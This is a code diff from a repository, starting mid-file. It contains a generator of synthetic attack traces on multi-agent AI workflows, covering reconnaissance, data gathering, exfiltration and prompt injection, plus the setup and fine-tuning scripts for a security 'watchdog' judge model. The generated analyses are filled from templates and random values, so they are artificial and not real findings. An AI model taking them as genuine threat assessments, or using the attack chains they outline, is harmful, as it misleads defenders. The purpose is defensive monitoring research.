"attributes": {"agent": agent_name, "coordination": "distributed_attack", "risk_level": "critical"}
|
| 292 |
+
})
|
| 293 |
+
|
| 294 |
+
# Agent A: reconnaissance, Agent B: data gathering, Agent C: exfiltration
|
| 295 |
+
if agent_name == "agent_A":
|
| 296 |
+
tool_invocations.append(generate_tool_invocation(
|
| 297 |
+
"file_system", "list_directory",
|
| 298 |
+
generate_timestamp(base_time, current_time_offset + 0.5),
|
| 299 |
+
{"defense_active": with_defense}
|
| 300 |
+
))
|
| 301 |
+
elif agent_name == "agent_B":
|
| 302 |
+
tool_invocations.append(generate_tool_invocation(
|
| 303 |
+
"database", "query",
|
| 304 |
+
generate_timestamp(base_time, current_time_offset + 0.5),
|
| 305 |
+
{"defense_active": with_defense}
|
| 306 |
+
))
|
| 307 |
+
else:
|
| 308 |
+
tool_invocations.append(generate_tool_invocation(
|
| 309 |
+
"network", "upload_file",
|
| 310 |
+
generate_timestamp(base_time, current_time_offset + 0.5),
|
| 311 |
+
{"defense_active": with_defense}
|
| 312 |
+
))
|
| 313 |
+
|
| 314 |
+
current_time_offset += 2.5
|
| 315 |
+
|
| 316 |
+
# Attack snapshot with analysis
|
| 317 |
+
attack_success = not with_defense or random.random() < 0.1 # 10% defense bypass rate
|
| 318 |
+
|
| 319 |
+
# Calculate propagation percentage
|
| 320 |
+
affected_spans = sum(1 for span in spans if any(attr in str(span.get('attributes', {})).lower() for attr in ['risk', 'attack', 'malicious', 'suspicious']))
|
| 321 |
+
propagation_percentage = (affected_spans / len(spans) * 100) if spans else 0.0
|
| 322 |
+
|
| 323 |
+
attack_snapshot = {
|
| 324 |
+
"category": category,
|
| 325 |
+
"pattern": pattern,
|
| 326 |
+
"attack_type": ATTACK_CATEGORIES[category]["description"],
|
| 327 |
+
"severity": ATTACK_CATEGORIES[category]["severity"],
|
| 328 |
+
"success": attack_success,
|
| 329 |
+
"propagation_path": " → ".join([span["name"] for span in spans]),
|
| 330 |
+
"propagation_percentage": propagation_percentage,
|
| 331 |
+
"total_spans": len(spans),
|
| 332 |
+
"total_tools": len(tool_invocations),
|
| 333 |
+
"defense_active": with_defense,
|
| 334 |
+
"defense_mechanisms": random.sample(DEFENSE_MECHANISMS, k=random.randint(2, 4)) if with_defense else [],
|
| 335 |
+
"indicators": {
|
| 336 |
+
"suspicious_network_activity": any(t["tool_name"].startswith("network") for t in tool_invocations),
|
| 337 |
+
"privilege_changes": any(t["tool_name"].startswith("auth") for t in tool_invocations),
|
| 338 |
+
"data_volume_anomaly": sum(t.get("parameters", {}).get("bytes_read", 0) for t in tool_invocations) > 1048576,
|
| 339 |
+
"external_communication": any("attacker" in str(t.get("parameters", {})) for t in tool_invocations)
|
| 340 |
+
}
|
| 341 |
+
}
|
| 342 |
+
|
| 343 |
+
return {
|
| 344 |
+
"trace_id": trace_id,
|
| 345 |
+
"timestamp": generate_timestamp(base_time, 0),
|
| 346 |
+
"category": category,
|
| 347 |
+
"pattern": pattern,
|
| 348 |
+
"with_defense": with_defense,
|
| 349 |
+
"otel_trace": {
|
| 350 |
+
"trace_id": trace_id,
|
| 351 |
+
"spans": spans,
|
| 352 |
+
"tool_invocations": tool_invocations
|
| 353 |
+
},
|
| 354 |
+
"attack_snapshot": attack_snapshot
|
| 355 |
+
}
|
| 356 |
+
|
| 357 |
+
|
| 358 |
+
def convert_to_training_format(trace_data: Dict[str, Any]) -> Dict[str, str]:
|
| 359 |
+
"""Convert OTEL trace to instruction-response training format"""
|
| 360 |
+
trace = trace_data["otel_trace"]
|
| 361 |
+
attack = trace_data["attack_snapshot"]
|
| 362 |
+
|
| 363 |
+
# Build instruction (more concise to match original ~644 chars avg)
|
| 364 |
+
instruction = f"""Analyze the following agentic workflow execution for potential security threats.
|
| 365 |
+
|
| 366 |
+
**Trace Information:**
|
| 367 |
+
- Trace ID: {trace_data['trace_id']}
|
| 368 |
+
- Workflow Type: SECURITY
|
| 369 |
+
- Attack Category: {attack['category']}
|
| 370 |
+
- Attack Subcategory: {attack['pattern']}
|
| 371 |
+
- Total Workflow Spans: {attack['total_spans']}
|
| 372 |
+
- Defense Mechanisms: {'Active' if trace_data['with_defense'] else 'Inactive'}
|
| 373 |
+
|
| 374 |
+
**Execution Trace:**
|
| 375 |
+
{json.dumps(trace, indent=2)[:800]}
|
| 376 |
+
|
| 377 |
+
Provide a comprehensive security analysis."""
|
| 378 |
+
|
| 379 |
+
# Build response with security analysis (more detailed to match original)
|
| 380 |
+
defense_status = "BLOCKED" if trace_data['with_defense'] and not attack['success'] else "SUCCESSFUL"
|
| 381 |
+
|
| 382 |
+
response = f"""**Agentic Workflow Security Analysis**
|
| 383 |
+
|
| 384 |
+
Trace ID: {trace_data['trace_id']}
|
| 385 |
+
Dataset: SYNTHETIC_SECURITY
|
| 386 |
+
|
| 387 |
+
**Attack Classification:**
|
| 388 |
+
- Category: {attack['category']}
|
| 389 |
+
- Subcategory: {attack['pattern']}
|
| 390 |
+
- Attack Type: {attack['attack_type']}
|
| 391 |
+
- Severity Level: {attack['severity'].upper()}
|
| 392 |
+
- Attack Status: {defense_status}
|
| 393 |
+
- Success Rate: {'0%' if not attack['success'] else '100%'}
|
| 394 |
+
|
| 395 |
+
**Workflow Analysis:**
|
| 396 |
+
- Total Spans Analyzed: {attack['total_spans']}
|
| 397 |
+
- Tool Invocations Detected: {attack['total_tools']}
|
| 398 |
+
- Attack Propagation Path: {attack['propagation_path']}
|
| 399 |
+
- Workflow Complexity Score: {'HIGH' if attack['total_spans'] > 4 else 'MEDIUM' if attack['total_spans'] > 2 else 'LOW'}
|
| 400 |
+
|
| 401 |
+
**Security Threat Indicators:**
|
| 402 |
+
"""
|
| 403 |
+
|
| 404 |
+
for indicator, detected in attack['indicators'].items():
|
| 405 |
+
if detected:
|
| 406 |
+
response += f" • {indicator.replace('_', ' ').title()}: DETECTED\n"
|
| 407 |
+
|
| 408 |
+
if trace_data['with_defense']:
|
| 409 |
+
response += f"\n**Defense Mechanisms Applied:**\n"
|
| 410 |
+
for mechanism in attack['defense_mechanisms']:
|
| 411 |
+
response += f" • {mechanism.replace('_', ' ').title()}: ACTIVE\n"
|
| 412 |
+
|
| 413 |
+
response += f"""
|
| 414 |
+
**Risk Assessment Summary:**
|
| 415 |
+
- Attack Propagation: {attack['propagation_percentage']:.1f}% of workflow spans affected
|
| 416 |
+
- Tool Invocation Risk: {attack['total_tools']} potentially malicious operations
|
| 417 |
+
- Workflow Integrity: {'COMPROMISED' if attack['success'] else 'PROTECTED'}
|
| 418 |
+
- Defense Effectiveness: {'100%' if not attack['success'] and trace_data['with_defense'] else '0%' if attack['success'] else 'N/A'}
|
| 419 |
+
|
| 420 |
+
**Recommended Security Controls:**
|
| 421 |
+
"""
|
| 422 |
+
|
| 423 |
+
if attack['category'] == 'tool_exfiltration':
|
| 424 |
+
response += """1. Implement data loss prevention (DLP) controls on all agent tool outputs
|
| 425 |
+
2. Enable comprehensive egress traffic monitoring and alerting
|
| 426 |
+
3. Enforce principle of least privilege for data access operations
|
| 427 |
+
4. Deploy ML-based anomaly detection for unusual data volumes
|
| 428 |
+
5. Implement workflow-level rate limiting on sensitive operations"""
|
| 429 |
+
elif attack['category'] == 'privilege_escalation':
|
| 430 |
+
response += """1. Require multi-factor authentication for all role modification operations
|
| 431 |
+
2. Implement time-based and context-aware access controls
|
| 432 |
+
3. Audit privilege escalation velocity and anomalous patterns
|
| 433 |
+
4. Enable just-in-time (JIT) access provisioning
|
| 434 |
+
5. Monitor cross-agent permission inheritance chains"""
|
| 435 |
+
elif attack['category'] == 'multi_agent_coordination':
|
| 436 |
+
response += """1. Deploy cross-agent correlation monitoring and analysis
|
| 437 |
+
2. Implement workflow-level rate limiting and throttling
|
| 438 |
+
3. Enable distributed attack pattern detection across agent network
|
| 439 |
+
4. Isolate agent execution contexts with network segmentation
|
| 440 |
+
5. Monitor inter-agent communication patterns for anomalies"""
|
| 441 |
+
elif attack['category'] == 'prompt_injection':
|
| 442 |
+
response += """1. Strengthen input validation and sanitization across all agents
|
| 443 |
+
2. Implement prompt firewall and content filtering
|
| 444 |
+
3. Deploy behavior-based anomaly detection for agent responses
|
| 445 |
+
4. Enable comprehensive audit logging of all prompt variations
|
| 446 |
+
5. Implement real-time security monitoring of agent outputs"""
|
| 447 |
+
elif attack['category'] == 'stealth_attack':
|
| 448 |
+
response += """1. Deploy temporal analysis and time-series anomaly detection
|
| 449 |
+
2. Implement workflow state tracking with integrity verification
|
| 450 |
+
3. Enable long-duration attack pattern detection
|
| 451 |
+
4. Monitor for time-delayed or staged attack sequences
|
| 452 |
+
5. Implement continuous behavioral baseline monitoring"""
|
| 453 |
+
else: # policy_violation
|
| 454 |
+
response += """1. Strengthen compliance policy enforcement mechanisms
|
| 455 |
+
2. Deploy real-time policy violation detection and alerting
|
| 456 |
+
3. Implement comprehensive audit logging for compliance tracking
|
| 457 |
+
4. Enable automated policy remediation workflows
|
| 458 |
+
5. Monitor for policy bypass attempts and evasion tactics"""
|
| 459 |
+
|
| 460 |
+
return {
|
| 461 |
+
"instruction": instruction,
|
| 462 |
+
"response": response,
|
| 463 |
+
"trace_id": trace_data['trace_id'],
|
| 464 |
+
"dataset_type": "synthetic_security",
|
| 465 |
+
"attack_success": attack['success']
|
| 466 |
+
}
|
| 467 |
+
|
| 468 |
+
|
| 469 |
+
def generate_dataset(num_examples: int = 10796, output_dir: str = "./data") -> None:
|
| 470 |
+
"""Generate complete synthetic OTEL trace dataset"""
|
| 471 |
+
output_path = Path(output_dir)
|
| 472 |
+
output_path.mkdir(exist_ok=True)
|
| 473 |
+
|
| 474 |
+
print(f"Generating {num_examples} synthetic OpenTelemetry workflow traces...")
|
| 475 |
+
|
| 476 |
+
# Split examples across categories and defense states
|
| 477 |
+
categories = list(ATTACK_CATEGORIES.keys())
|
| 478 |
+
examples_per_category = num_examples // len(categories)
|
| 479 |
+
|
| 480 |
+
all_training_examples = []
|
| 481 |
+
|
| 482 |
+
for category in categories:
|
| 483 |
+
patterns = ATTACK_CATEGORIES[category]["patterns"]
|
| 484 |
+
|
| 485 |
+
for i in range(examples_per_category):
|
| 486 |
+
pattern = random.choice(patterns)
|
| 487 |
+
with_defense = i % 2 == 0 # 50% with defense, 50% without
|
| 488 |
+
|
| 489 |
+
# Generate trace
|
| 490 |
+
trace_data = generate_attack_trace(category, pattern, with_defense)
|
| 491 |
+
|
| 492 |
+
# Convert to training format
|
| 493 |
+
training_example = convert_to_training_format(trace_data)
|
| 494 |
+
all_training_examples.append(training_example)
|
| 495 |
+
|
| 496 |
+
if (i + 1) % 100 == 0:
|
| 497 |
+
print(f" {category}: {i + 1}/{examples_per_category} traces generated")
|
| 498 |
+
|
| 499 |
+
# Shuffle all examples
|
| 500 |
+
random.shuffle(all_training_examples)
|
| 501 |
+
|
| 502 |
+
# Save to JSONL
|
| 503 |
+
output_file = output_path / "synthetic_otel_traces_training.jsonl"
|
| 504 |
+
with open(output_file, 'w') as f:
|
| 505 |
+
for example in all_training_examples:
|
| 506 |
+
f.write(json.dumps(example) + '\n')
|
| 507 |
+
|
| 508 |
+
print(f"\n✓ Generated {len(all_training_examples)} training examples")
|
| 509 |
+
print(f"✓ Saved to: {output_file}")
|
| 510 |
+
print(f"✓ File size: {output_file.stat().st_size / 1024 / 1024:.2f} MB")
|
| 511 |
+
|
| 512 |
+
# Generate statistics
|
| 513 |
+
print(f"\nDataset Statistics:")
|
| 514 |
+
print(f"- Total examples: {len(all_training_examples)}")
|
| 515 |
+
print(f"- Categories: {len(categories)}")
|
| 516 |
+
print(f"- Examples per category: ~{examples_per_category}")
|
| 517 |
+
print(f"\nCategory breakdown:")
|
| 518 |
+
for category in categories:
|
| 519 |
+
count = sum(1 for ex in all_training_examples if category in ex['instruction'])
|
| 520 |
+
print(f" - {category}: {count} examples ({count/len(all_training_examples)*100:.1f}%)")
|
| 521 |
+
|
| 522 |
+
|
| 523 |
+
if __name__ == "__main__":
|
| 524 |
+
# Set random seed for reproducibility
|
| 525 |
+
random.seed(42)
|
| 526 |
+
|
| 527 |
+
# Generate dataset (45,825 examples to match NVIDIA dataset size)
|
| 528 |
+
generate_dataset(num_examples=45825, output_dir="./data")
|
| 529 |
+
|
| 530 |
+
print("\n✓ Synthetic OTEL trace dataset generation complete!")
|
| 531 |
+
print("\nThis dataset is independently generated and does not use NVIDIA Nemotron data.")
|
| 532 |
+
print("It follows similar OpenTelemetry trace structures for agentic security research.")
|
install_arm64.sh
ADDED
|
@@ -0,0 +1,42 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/bin/bash
|
| 2 |
+
# ARM64 + CUDA setup for NVIDIA DGX Spark
|
| 3 |
+
|
| 4 |
+
set -e
|
| 5 |
+
|
| 6 |
+
echo "Setting up ARM64 environment..."
|
| 7 |
+
|
| 8 |
+
# 1. Install ARM64-compatible PyTorch with CUDA 12.1
|
| 9 |
+
echo "[1/4] Installing PyTorch..."
|
| 10 |
+
pip install torch==2.3.0+cu121 torchvision==0.18.0+cu121 torchaudio==2.3.0 \
|
| 11 |
+
--index-url https://download.pytorch.org/whl/cu121
|
| 12 |
+
|
| 13 |
+
# 2. Build BitsAndBytes from source (no ARM64 wheels)
|
| 14 |
+
echo "[2/4] Building BitsAndBytes..."
|
| 15 |
+
sudo apt-get update
|
| 16 |
+
sudo apt-get install -y build-essential cmake libopenblas-dev
|
| 17 |
+
pip install bitsandbytes==0.43.0 --no-binary bitsandbytes
|
| 18 |
+
|
| 19 |
+
# 3. Install Transformers stack
|
| 20 |
+
echo "[3/4] Installing dependencies..."
|
| 21 |
+
pip install transformers==4.40.0 \
|
| 22 |
+
datasets==2.18.0 \
|
| 23 |
+
peft==0.10.0 \
|
| 24 |
+
accelerate==0.28.0 \
|
| 25 |
+
sentencepiece==0.2.0 \
|
| 26 |
+
scikit-learn==1.4.1
|
| 27 |
+
|
| 28 |
+
# 4. Configure vLLM for ARM64
|
| 29 |
+
echo "[4/4] Configuring vLLM..."
|
| 30 |
+
export VLLM_USE_TRITON_FLASH_ATTN=0
|
| 31 |
+
export VLLM_ATTENTION_BACKEND=TORCH_SDPA
|
| 32 |
+
echo 'export VLLM_USE_TRITON_FLASH_ATTN=0' >> ~/.bashrc
|
| 33 |
+
echo 'export VLLM_ATTENTION_BACKEND=TORCH_SDPA' >> ~/.bashrc
|
| 34 |
+
|
| 35 |
+
pip install vllm==0.4.0.post1
|
| 36 |
+
|
| 37 |
+
# Verify
|
| 38 |
+
python -c "import torch; print(f'PyTorch: {torch.__version__}'); print(f'CUDA: {torch.cuda.is_available()}')"
|
| 39 |
+
python -c "import bitsandbytes; print(f'BitsAndBytes: {bitsandbytes.__version__}')"
|
| 40 |
+
|
| 41 |
+
echo ""
|
| 42 |
+
echo "✓ ARM64 setup complete!"
|
train.py
ADDED
|
@@ -0,0 +1,378 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# This python script is the main fine-tuning script optimized for NVIDIA DGX Spark
|
| 2 |
+
# Copy and paste this code into a file named finetune_foundation_sec.py
|
| 3 |
+
|
| 4 |
+
import torch
|
| 5 |
+
import os
|
| 6 |
+
|
| 7 |
+
# Disable Triton compilation to avoid ARM64 issues
|
| 8 |
+
os.environ['TORCHDYNAMO_DISABLE'] = '1'
|
| 9 |
+
os.environ['TORCH_COMPILE_DISABLE'] = '1'
|
| 10 |
+
|
| 11 |
+
from unsloth import FastLanguageModel
|
| 12 |
+
from datasets import load_dataset
|
| 13 |
+
from trl import SFTTrainer
|
| 14 |
+
from transformers import TrainingArguments, TrainerCallback
|
| 15 |
+
import time
|
| 16 |
+
import sys
|
| 17 |
+
from datetime import datetime, timedelta
|
| 18 |
+
import json
|
| 19 |
+
|
| 20 |
+
# Progress tracking class
|
| 21 |
+
class ProgressCallback(TrainerCallback):
|
| 22 |
+
def __init__(self, total_steps):
|
| 23 |
+
self.total_steps = total_steps
|
| 24 |
+
self.start_time = None
|
| 25 |
+
self.step_times = []
|
| 26 |
+
self.losses = []
|
| 27 |
+
self.last_update = 0
|
| 28 |
+
self.crashed = False
|
| 29 |
+
|
| 30 |
+
def on_train_begin(self, args, state, control, **kwargs):
|
| 31 |
+
self.start_time = time.time()
|
| 32 |
+
print("\n" + "="*80)
|
| 33 |
+
print("Training Started: {}".format(datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
|
| 34 |
+
print("="*80 + "\n")
|
| 35 |
+
|
| 36 |
+
def on_log(self, args, state, control, logs=None, **kwargs):
|
| 37 |
+
if logs is None:
|
| 38 |
+
return
|
| 39 |
+
|
| 40 |
+
current_step = state.global_step
|
| 41 |
+
if current_step == 0 or current_step == self.last_update:
|
| 42 |
+
return
|
| 43 |
+
|
| 44 |
+
self.last_update = current_step
|
| 45 |
+
|
| 46 |
+
# Record metrics
|
| 47 |
+
if 'loss' in logs:
|
| 48 |
+
self.losses.append(logs['loss'])
|
| 49 |
+
|
| 50 |
+
# Calculate progress
|
| 51 |
+
progress = current_step / self.total_steps
|
| 52 |
+
elapsed = time.time() - self.start_time
|
| 53 |
+
|
| 54 |
+
# Estimate remaining time
|
| 55 |
+
if current_step > 0:
|
| 56 |
+
avg_time_per_step = elapsed / current_step
|
| 57 |
+
remaining_steps = self.total_steps - current_step
|
| 58 |
+
eta_seconds = avg_time_per_step * remaining_steps
|
| 59 |
+
eta = str(timedelta(seconds=int(eta_seconds)))
|
| 60 |
+
else:
|
| 61 |
+
eta = "calculating..."
|
| 62 |
+
|
| 63 |
+
# Progress bar (50 chars wide)
|
| 64 |
+
bar_length = 50
|
| 65 |
+
filled = int(bar_length * progress)
|
| 66 |
+
bar = '█' * filled + '░' * (bar_length - filled)
|
| 67 |
+
|
| 68 |
+
# Clear line and print progress
|
| 69 |
+
sys.stdout.write('\r\033[K') # Clear line
|
| 70 |
+
|
| 71 |
+
# Main progress line
|
| 72 |
+
progress_line = f"Progress: [{bar}] {progress*100:.1f}% | Step {current_step}/{self.total_steps}"
|
| 73 |
+
print(progress_line)
|
| 74 |
+
|
| 75 |
+
# Metrics line
|
| 76 |
+
loss_str = f"{logs.get('loss', 0):.4f}" if 'loss' in logs else "N/A"
|
| 77 |
+
lr_str = f"{logs.get('learning_rate', 0):.2e}" if 'learning_rate' in logs else "N/A"
|
| 78 |
+
|
| 79 |
+
metrics_line = f"Loss: {loss_str} | LR: {lr_str} | Elapsed: {str(timedelta(seconds=int(elapsed)))} | ETA: {eta}"
|
| 80 |
+
print(metrics_line)
|
| 81 |
+
|
| 82 |
+
# Mini loss graph (last 20 steps)
|
| 83 |
+
if len(self.losses) > 1:
|
| 84 |
+
self._print_mini_graph()
|
| 85 |
+
|
| 86 |
+
print() # New line for next update
|
| 87 |
+
|
| 88 |
+
def _print_mini_graph(self):
|
| 89 |
+
"""Print a simple ASCII graph of recent losses"""
|
| 90 |
+
recent_losses = self.losses[-20:] # Last 20 losses
|
| 91 |
+
if len(recent_losses) < 2:
|
| 92 |
+
return
|
| 93 |
+
|
| 94 |
+
# Normalize to 0-10 range for display
|
| 95 |
+
min_loss = min(recent_losses)
|
| 96 |
+
max_loss = max(recent_losses)
|
| 97 |
+
range_loss = max_loss - min_loss if max_loss > min_loss else 1
|
| 98 |
+
|
| 99 |
+
graph_height = 5
|
| 100 |
+
graph = [[] for _ in range(graph_height)]
|
| 101 |
+
|
| 102 |
+
for loss in recent_losses:
|
| 103 |
+
normalized = (loss - min_loss) / range_loss
|
| 104 |
+
level = int(normalized * (graph_height - 1))
|
| 105 |
+
|
| 106 |
+
for i in range(graph_height):
|
| 107 |
+
if i == (graph_height - 1 - level):
|
| 108 |
+
graph[i].append('●')
|
| 109 |
+
else:
|
| 110 |
+
graph[i].append(' ')
|
| 111 |
+
|
| 112 |
+
print("\nLoss Trend (last 20 steps):")
|
| 113 |
+
print(f" {max_loss:.4f} ┤" + ''.join(graph[0]))
|
| 114 |
+
for i in range(1, graph_height - 1):
|
| 115 |
+
print(" │" + ''.join(graph[i]))
|
| 116 |
+
print(f" {min_loss:.4f} └" + '─' * len(recent_losses))
|
| 117 |
+
|
| 118 |
+
def on_train_end(self, args, state, control, **kwargs):
|
| 119 |
+
total_time = time.time() - self.start_time
|
| 120 |
+
|
| 121 |
+
print("\n" + "="*80)
|
| 122 |
+
print("Training Completed: {}".format(datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
|
| 123 |
+
print("="*80)
|
| 124 |
+
print(f"Total training time: {str(timedelta(seconds=int(total_time)))}")
|
| 125 |
+
print(f"Average time per step: {total_time/self.total_steps:.2f}s")
|
| 126 |
+
if self.losses:
|
| 127 |
+
print(f"Final loss: {self.losses[-1]:.4f}")
|
| 128 |
+
print(f"Best loss: {min(self.losses):.4f}")
|
| 129 |
+
print("="*80 + "\n")
|
| 130 |
+
|
| 131 |
+
print("="*80)
|
| 132 |
+
print("LLM-as-a-Judge Watchdog Training - Comprehensive Security & Evaluation")
|
| 133 |
+
print("NVIDIA DGX Spark - Unsloth Optimized Training")
|
| 134 |
+
print("="*80)
|
| 135 |
+
|
| 136 |
+
# Configuration optimized for DGX Spark (128 GB unified memory)
|
| 137 |
+
max_seq_length = 8192 # Foundation-Sec supports up to 64k
|
| 138 |
+
dtype = None # Auto-detect (will use bfloat16 on DGX Spark)
|
| 139 |
+
load_in_4bit = True # QLoRA for memory efficiency
|
| 140 |
+
|
| 141 |
+
print("\n[1/6] Loading Foundation-Sec-1.1-8B-Instruct model...")
|
| 142 |
+
print(f" - Max sequence length: {max_seq_length}")
|
| 143 |
+
print(f" - Quantization: 4-bit (QLoRA)")
|
| 144 |
+
|
| 145 |
+
# Load the model from Hugging Face
|
| 146 |
+
model, tokenizer = FastLanguageModel.from_pretrained(
|
| 147 |
+
model_name = "fdtn-ai/Foundation-Sec-1.1-8B-Instruct",
|
| 148 |
+
max_seq_length = max_seq_length,
|
| 149 |
+
dtype = dtype,
|
| 150 |
+
load_in_4bit = load_in_4bit,
|
| 151 |
+
)
|
| 152 |
+
|
| 153 |
+
print("✓ Model loaded successfully")
|
| 154 |
+
|
| 155 |
+
print("\n[2/6] Applying LoRA adapters for efficient fine-tuning...")
|
| 156 |
+
|
| 157 |
+
# Apply LoRA for parameter-efficient fine-tuning
|
| 158 |
+
model = FastLanguageModel.get_peft_model(
|
| 159 |
+
model,
|
| 160 |
+
r = 16, # LoRA rank (higher = more parameters, better quality)
|
| 161 |
+
target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
|
| 162 |
+
"gate_proj", "up_proj", "down_proj"],
|
| 163 |
+
lora_alpha = 16,
|
| 164 |
+
lora_dropout = 0.05,
|
| 165 |
+
bias = "none",
|
| 166 |
+
use_gradient_checkpointing = "unsloth", # Unsloth's memory optimization
|
| 167 |
+
random_state = 3407,
|
| 168 |
+
)
|
| 169 |
+
|
| 170 |
+
print("✓ LoRA adapters applied")
|
| 171 |
+
|
| 172 |
+
print("\n[3/6] Loading and formatting training data...")
|
| 173 |
+
|
| 174 |
+
# Formatting function for Llama 3.1 chat template
|
| 175 |
+
def formatting_prompts_func(examples):
|
| 176 |
+
instructions = examples["instruction"]
|
| 177 |
+
responses = examples["response"]
|
| 178 |
+
texts = []
|
| 179 |
+
|
| 180 |
+
for instruction, response in zip(instructions, responses):
|
| 181 |
+
# Llama 3.1 Instruct format
|
| 182 |
+
text = f"""<|begin_of_text|><|start_header_id|>system<|end_header_id|>
|
| 183 |
+
|
| 184 |
+
You are a cybersecurity AI assistant specialized in analyzing agentic workflow executions for security threats and vulnerabilities. You have deep expertise in:
|
| 185 |
+
- Detecting multi-step attack patterns in autonomous AI systems
|
| 186 |
+
- Analyzing attack propagation through complex workflows
|
| 187 |
+
- Assessing the effectiveness of security guardrails
|
| 188 |
+
- Providing actionable security recommendations
|
| 189 |
+
|
| 190 |
+
Your analysis should be thorough, technically accurate, and focused on protecting enterprise agentic AI deployments.<|eot_id|><|start_header_id|>user<|end_header_id|>
|
| 191 |
+
|
| 192 |
+
{instruction}<|eot_id|><|start_header_id|>assistant<|end_header_id|>
|
| 193 |
+
|
| 194 |
+
{response}<|eot_id|>"""
|
| 195 |
+
texts.append(text)
|
| 196 |
+
|
| 197 |
+
return {"text": texts}
|
| 198 |
+
|
| 199 |
+
# Load training dataset
|
| 200 |
+
print("Loading dataset from: ./training_data_v3_synthetic.jsonl")
|
| 201 |
+
dataset = load_dataset('json', data_files='./training_data_v3_synthetic.jsonl', split='train')
|
| 202 |
+
dataset = dataset.map(formatting_prompts_func, batched=True)
|
| 203 |
+
|
| 204 |
+
print(f"✓ Training dataset loaded: {len(dataset):,} examples")
|
| 205 |
+
print(f" Dataset size: {os.path.getsize('./training_data_v3_synthetic.jsonl') / (1024*1024):.1f} MB")
|
| 206 |
+
|
| 207 |
+
print("\n[4/6] Configuring training parameters...")
|
